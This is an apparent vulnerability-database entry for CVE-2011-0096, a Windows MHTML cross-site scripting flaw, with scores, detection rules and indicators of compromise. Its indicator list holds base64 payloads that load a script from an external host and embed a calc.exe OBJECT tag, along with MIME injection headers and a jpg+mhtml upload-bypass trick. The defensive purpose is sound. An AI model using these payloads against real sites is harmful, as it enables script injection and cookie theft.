cbcvebase.
CVE-2011-0096
published 2011-01-31

CVE-2011-0096: The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2…

PriorityP279medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
46.82%
98.7th percentile
The MHTML protocol handler in Microsoft Windows XP SP2 and SP3, Windows Server 2003 SP2, Windows Vista SP1 and SP2, Windows Server 2008 Gold, SP2, R2, and R2 SP1, and Windows 7 Gold and SP1 does not properly handle a MIME format in a request for content blocks in a document, which allows remote attackers to conduct cross-site scripting (XSS) attacks via a crafted web site that is visited in Internet Explorer, aka "MHTML Mime-Formatted Request Vulnerability."

Affected

1 ranges
VendorProductVersion rangeFixed in
microsoftwindows_server_2008

Detection & IOCsextracted from sources · hover to see the quote

urlhttp://www.80vul.com/hackgame/xs-g0.php?username=Administrator
urlhttp://www.80vul.com/hackgame/go.js
urlhttp://www.80vul.com/mhtml/word.doc
otherContent-Type: multipart/related; boundary="_boundary_by_mere"
otherContent-Location:cookie Content-Transfer-Encoding:base64
domainwww.80vul.com
bytes
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
bytes
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
  • Detect MHTML protocol handler abuse by monitoring for URLs or iframe src attributes beginning with 'mhtml:' in HTTP traffic or HTML content, which is the attack vector for this XSS vulnerability.
  • Detect MHTML MIME boundary injection by looking for HTTP responses or uploaded files containing 'Content-Type: multipart/related; boundary=' combined with 'Content-Location:' and 'Content-Transfer-Encoding:base64' headers embedded in non-MIME content types (e.g., image files, JSON).
  • Detect bypass of upload file format restrictions by inspecting files with image extensions (e.g., .jpg) for embedded MHTML MIME multipart headers, as attackers combine binary files with MHTML content using 'copy /b 1.jpg + 1.mhtml 2.jpg'.
  • Detect X-Frame-Options bypass attempts where mhtml: protocol is used as an iframe src, since X-Frame-Options does not protect the mhtml protocol handler.
  • Monitor for MHTML injection in JSON responses: attackers may inject MHTML MIME headers into JSON files to bypass Content-Type restrictions intended to prevent XSS.
  • Publicly available exploit code exists for CVE-2011-0096; monitor for exploitation attempts even though targeted attacks had not been observed in the wild at time of disclosure.
  • ·Double URL-encoding is required for exploitation on Windows XP and Windows Server 2003 systems, whereas single encoding is used on Windows 7.
  • ·The 'Microsoft Word JavaScript execution' attack chain (scenario 5/6) only works on Office 2003 and Office 2007; other versions require a different delivery method.
  • ·The Cross Zone Scripting variant (scenario 6) using MHTML + file://uncpath + Word was tested and confirmed on IE6/IE7/IE8 running on Windows 2000, Windows XP, and Windows Server 2003.
  • ·No patch was available at time of initial disclosure; Microsoft issued only a security advisory with recommended workarounds and patch availability timeline was unknown.

CVSS provenance

nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vulncheck6.1MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.